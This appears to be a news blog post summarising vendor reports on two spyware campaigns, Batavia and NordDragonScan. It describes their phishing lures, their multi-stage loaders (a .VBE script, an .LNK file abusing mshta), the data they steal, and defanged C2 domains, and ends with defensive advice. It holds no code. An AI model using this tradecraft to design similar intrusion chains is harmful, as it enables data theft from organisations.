A New Spyware Called Batavia is Stealing Docs from Russian Companies — and Hardly Anyone Noticed

So, here is something that kind of flew under the radar, but definitely should not have: security researchers just found this new spyware called Batavia targeting Russian companies. It is not some recycled malware with a fancy name slapped on it. It is a completely new spyware, and it has been doing its thing since mid-2024 without drawing much attention — until now.

Kaspersky is the one that published the details. They say the whole thing starts out pretty standard, as far as phishing attacks go. Victims get an email that looks like it is about signing a contract — which, if you work in finance or legal, is just another Tuesday. The email includes a link, but instead of a regular attachment, it leads to a zip or archive file. Inside that, there is a .VBE file — a Visual Basic Encoded script. If you are wondering, yeah, people still fall for those. A surprising number of them.

Once you run the script, that is when Batavia starts doing its thing. It checks out your system specs first — basically profiling the host — and then phones home to a remote server. After that, it grabs the next payload, which is a Delphi-based executable. That might sound weird because not many modern malware strains use Delphi anymore, but hey, it still works, and maybe that is the point. Makes detection a little less predictable.

Oh, and get this — while the fake contract pops up on screen like nothing shady is going on, Batavia is quietly rummaging through your files in the background. Office docs, PDFs, spreadsheets — the usual suspects. It even grabs screenshots and checks any USB drives that are plugged in. It is not flashy, just efficient.

But it does not stop there.

Once that part is done, another stage kicks in. The malware pulls down another binary, which broadens the scope. Now it is looking for emails, pictures, slide decks, zipped archives, CSVs, you name it. Basically, anything remotely valuable or sensitive. That part of the data gets shipped off to a second domain — ru-exchange[.]com. After that, there is apparently one more executable that gets downloaded. Nobody knows exactly what that last one does yet, but let’s be real — it is probably not good.

And while this whole thing sounds like a complex multi-stage nightmare (because it kind of is), it is been quietly hitting dozens of Russian orgs. According to Kaspersky’s telemetry, more than 100 users across various companies received these phishing emails over the past year. That is a decent footprint for something that had not been identified until now.

Also, for what it is worth, Batavia does not just steal documents. It also dumps details like which programs you have installed, drivers, OS components — stuff that could be useful for profiling the target or maybe prepping for a more targeted attack later.

Now, while everyone is still wrapping their heads around Batavia, another campaign has popped up too — this one involving malware called NordDragonScan. This was detailed by Fortinet’s FortiGuard Labs, and it is not really related to Batavia, but they both follow a similar kind of stealthy, staged infection model.

So here is how NordDragonScan works: it usually arrives via a phishing email (because of course it does), which drops a RAR file. Inside the archive? A Windows shortcut — .LNK file — that abuses mshta.exe to run a remote HTML Application (HTA). If that sounds old-school, it is, but it still works. When the HTA runs, it opens a decoy document in Ukrainian (totally harmless-looking), while a .NET-based payload gets silently dropped in the background.

What does NordDragonScan do once it is in? Pretty similar playbook. It scans the machine, takes screenshots, scrapes browser data (Chrome and Firefox profiles are prime targets), and pulls docs and PDFs. The fun part? It even sets up persistence by messing with the Windows Registry, so the malware can survive reboots. Everything it grabs gets sent back to a C2 server at kpuszkiev[.]com through a plain HTTP POST request.

So yeah, nothing earth-shatteringly new in terms of technique, but these attacks are getting cleaner, quieter, and honestly more patient. They do not try to blow the door off the hinges. They sneak in, look around, grab what they need, and leave the lights on so you do not notice.

You might be wondering — why should anyone outside of Russia care about Batavia or NordDragonScan? Well, the tactics are what matter. These multi-stage, stealth-heavy infection chains are becoming more common because they work. And if you are working in cybersecurity, or even just handling sensitive data at your company, this kind of stuff should be on your radar — especially if your defenses still mostly rely on detecting single-stage, obvious malware.

To be honest, a lot of companies are still super vulnerable to basic phishing that drops a .VBE or .LNK file. These are not even sophisticated attachments. They just exploit the fact that people are too busy or too trusting to double-check a file that looks like it is coming from HR or Legal.

So if nothing else, take this as a reminder to lock down email filtering, monitor traffic for weird C2 behavior, and maybe disable mshta.exe if you are not using it. Also — and this sounds obvious but people forget — train your users. A decent phishing simulation goes a long way.